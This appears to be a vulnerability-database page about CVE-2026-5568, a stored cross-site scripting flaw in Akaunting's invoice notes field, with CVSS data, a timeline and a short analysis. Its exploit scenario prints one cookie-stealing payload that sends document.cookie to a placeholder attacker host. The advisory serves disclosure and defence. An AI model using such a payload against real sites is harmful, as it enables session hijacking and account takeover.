Is there a public PoC exploit available for CVE-2026-5568?

Yes, a public proof-of-concept exploit is available for CVE-2026-5568. Prioritise patching immediately. EPSS: 0.0%.

Akaunting CVE-2026-5568

Q: What is the CVSS score of CVE-2026-5568?

CVE-2026-5568 has a CVSS 4.0 base score of 2.0 (Low). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.0%.

EUVD-2026-19083 LOW

Cross-site Scripting (XSS) (CWE-79)

2026-04-05 VulDB

XSS Akaunting

2.0

CVSS 4.0 · NVD

Severity by source

NVD PRIMARY

2.0 LOW

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

Scope

Lifecycle Timeline

Severity Changed

Apr 29, 2026 - 01:11 NVD

MEDIUM LOW

CVSS changed

Apr 29, 2026 - 01:11 NVD

5.1 (MEDIUM) 2.0 (LOW)

PoC Detected

Apr 07, 2026 - 13:20 vuln.today

Public exploit code

EUVD ID Assigned

Apr 05, 2026 - 13:15 euvd

EUVD-2026-19083

Analysis Generated

Apr 05, 2026 - 13:15 vuln.today

CVE Published

Apr 05, 2026 - 13:00 nvd

MEDIUM 5.1

DescriptionCVE.org

A vulnerability has been found in Akaunting up to 3.1.21. This issue affects some unknown processing of the component Invoice/Billing. The manipulation of the argument notes leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Cross-site scripting (XSS) in Akaunting up to version 3.1.21 allows authenticated users to inject malicious scripts via the notes parameter in the Invoice/Billing component, potentially compromising other users' sessions when they view affected invoices. The vulnerability requires user interaction (UI:P) to trigger and has publicly available exploit code; however, vendor remediation response is unknown.

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	While the CVSS score of 5.1 appears moderate, the actual real-world risk is constrained by multiple factors: the attack requires prior authentication (PR:L), victim user interaction (UI:P), and only impacts integrity of other sessions (VI:L), not confidentiality or availability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An authenticated attacker with access to Akaunting creates or modifies an invoice, injecting malicious JavaScript into the notes field (e.g., notes='<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'). When another authenticated user views that invoice, the script executes in their browser context, stealing session cookies or performing actions on their behalf such as modifying invoices, accessing customer data, or transferring funds if payment processing is integrated. …
Remediation	Upgrade Akaunting to a patched version released after this disclosure if available from the Akaunting project repository or official releases. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-5568 vulnerability details – vuln.today

Back